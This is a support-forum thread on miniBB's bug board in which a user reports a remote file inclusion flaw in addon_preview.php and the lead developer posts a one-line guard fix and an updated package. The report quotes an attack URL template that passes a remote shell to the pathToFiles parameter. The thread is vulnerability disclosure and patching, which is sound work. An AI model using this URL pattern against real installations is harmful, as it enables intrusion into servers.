miniBB Support Forums | 18 years on The Web
miniBB ® 


 | Start | Register | Search | Statistics | File Bank | Manual |
Bugs miniBB Support Forums / Bugs /   

miniBB 3.x Addon preview Remote File Include Vulnerability

Author Dransil
#1 | Posted: 17 Mar 2014 02:11 
I'm not looking to stir any trouble but I often search for exploits/vulns concerning the software that I personally use/run and I came across this today on an exploits-for-sale website, this particular exploit is being offered for free currently:
Found vulnerable code in file addon_preview.php line: 12
So an attacker can use it to compromise the system.
Not declared before &require parameter is: $pathToFiles
h t t p : / / [target]/[dir]/addon_preview.php?pathToFiles=[SHELL]

Author Paul
Lead Developer
#2 | Posted: 18 Mar 2014 22:25 | Edited by: Paul 
Thanks for this.

The only fix to provide is to put this line on top of execution of addon_preview.php:

if (!defined('INCLUDED776')) die ('Fatal error.');

Possibly this was out from the very ancient times, and the exploit actually will work only if PHP's setting register_globals is set to ON, which nowadays, obviously, met truly rarely on hostings. Also, it would work only on miniBB installations which would have Preview add-on installed.

I've updated the official package regarding this fix. Thanks again.

Bugs miniBB Support Forums / Bugs /
 miniBB 3.x Addon preview Remote File Include Vulnerability
 Share Topic's Link

Your Reply Click this icon to move up to the quoted message

Post as a Guest, leaving the Password field blank. You could also enter a Guest name, if it's not taken by a member yet. Sign-in and post at once, or just sign-in, bypassing the message's text.

Before posting, make sure your message is compliant with our forum posting rules. If not, it may be locked or deleted with no explanation.


miniBB Support Forums Powered by Forum Software miniBB ® Home  Features  Requirements  Demo  Download  Showcase  Gallery of Arts
Compiler  Premium Extensions  Premium Support  License  Contact Us
Check out the Captcha add-on: protect your miniBB-forums from the automated spam and flood.